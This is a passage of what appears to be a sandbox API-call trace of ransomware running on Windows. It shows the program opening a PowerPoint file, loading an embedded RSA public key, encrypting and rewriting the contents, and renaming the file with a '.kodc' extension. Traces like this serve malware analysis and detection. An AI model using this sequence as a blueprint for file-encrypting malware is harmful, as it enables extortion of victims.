ftLastAccessTime.dwLowDateTime=0xca87b610, ftLastAccessTime.dwHighDateTime=0x1d5519b, ftLastWriteTime.dwLowDateTime=0xca87b610, ftLastWriteTime.dwHighDateTime=0x1d5519b, nFileSizeHigh=0x0, nFileSizeLow=0x18006, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="utAOwW3nILc4ZQ3W8.pptx", cAlternateFileName="UTAOWW~1.PPT")) returned 1 [0098.779] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\utAOwW3nILc4ZQ3W8.pptx") returned=".pptx" [0098.779] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\utAOwW3nILc4ZQ3W8.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\utaoww3nilc4zq3w8.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0098.779] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=98310) returned 1 [0098.779] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0098.782] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x17fe0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.782] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0098.783] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.783] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.783] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.783] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x18006, lpOverlapped=0x0) returned 1 [0098.784] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.784] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0098.784] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.784] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.784] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x692d18) returned 1 [0098.785] CryptCreateHash (in: hProv=0x692d18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0098.785] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.785] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0098.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0098.785] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0098.785] GetLastError () returned 0x0 [0098.785] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0098.785] CryptReleaseContext (hProv=0x692d18, dwFlags=0x0) returned 1 [0098.785] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.785] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0098.785] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0098.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.785] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0098.785] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18010) returned 0x9ba4d90 [0098.786] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.786] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0098.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0098.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0098.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d600 [0098.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ab68 [0098.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d648 [0098.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ab80 [0098.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331abb0 [0098.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331abc8 [0098.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0098.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0098.786] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0098.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333a888 [0098.786] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331abb0 | out: hHeap=0x630000) returned 1 [0098.786] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331abc8 | out: hHeap=0x630000) returned 1 [0098.786] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.786] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0098.786] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0098.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0098.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331abc8 [0098.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0098.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331abb0 [0098.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0098.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c540 [0098.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0098.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0098.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0098.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c658 [0098.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0098.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.787] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0098.787] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331abc8 | out: hHeap=0x630000) returned 1 [0098.787] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.787] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331abb0 | out: hHeap=0x630000) returned 1 [0098.787] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0098.787] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.787] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.787] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0098.787] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0098.787] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.787] GetCurrentThreadId () returned 0x42c [0098.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0098.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9b8f748 [0098.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0098.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0098.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0098.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.787] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.787] GetCurrentThreadId () returned 0x42c [0098.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.788] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.788] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0098.788] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.788] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.788] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.788] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.788] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0098.788] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0098.788] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.788] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318ea0 [0098.788] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.788] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0098.788] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.788] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.788] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.788] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.788] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0098.788] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0098.788] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0098.788] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.788] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0098.788] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.788] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331abb0 [0098.788] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0098.788] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0098.788] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.788] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.788] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0098.788] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0098.788] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0098.788] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331abc8 [0098.788] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0098.788] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0098.788] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0098.788] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ab98 [0098.788] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0098.788] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.788] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.788] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.789] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0098.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.789] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0098.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331abe0 [0098.789] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a538 [0098.789] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0098.789] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0098.789] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0098.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0098.789] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331abb0 | out: hHeap=0x630000) returned 1 [0098.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331abb0 [0098.789] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0098.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0098.789] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c540 [0098.789] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32d0958 [0098.789] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0098.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c770 [0098.789] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0098.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0098.789] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331abb0 | out: hHeap=0x630000) returned 1 [0098.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x32cef08 [0098.789] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0098.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0098.789] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.789] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x692d18 | out: hHeap=0x630000) returned 1 [0098.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0098.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0098.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0098.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0098.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0098.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0098.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331abe0 | out: hHeap=0x630000) returned 1 [0098.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0098.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331abc8 | out: hHeap=0x630000) returned 1 [0098.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ab98 | out: hHeap=0x630000) returned 1 [0098.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0098.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0098.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0098.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ab80 | out: hHeap=0x630000) returned 1 [0098.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9d648 | out: hHeap=0x630000) returned 1 [0098.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0098.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0098.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318ea0 | out: hHeap=0x630000) returned 1 [0098.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0098.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0098.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0098.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0098.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0098.790] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba4d90*, nNumberOfBytesToWrite=0x18001, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba4d90*, lpNumberOfBytesWritten=0x9e2fb14*=0x18001, lpOverlapped=0x0) returned 1 [0098.791] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0098.791] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x18006, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.791] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0098.791] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0098.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x333a888 [0098.791] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333a888, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0098.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333b018 [0098.791] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0098.791] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.791] WriteFile (in: hFile=0x5cc, lpBuffer=0x333b018*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333b018*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0098.791] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0098.791] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.791] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0098.791] CloseHandle (hObject=0x5cc) returned 1 [0098.793] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.793] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x32d0db8 [0098.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x692d18 | out: hHeap=0x630000) returned 1 [0098.793] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\utAOwW3nILc4ZQ3W8.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\utaoww3nilc4zq3w8.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\utAOwW3nILc4ZQ3W8.pptx.kodc" (normalized: "c:\\users\\5p5nrgjn0js 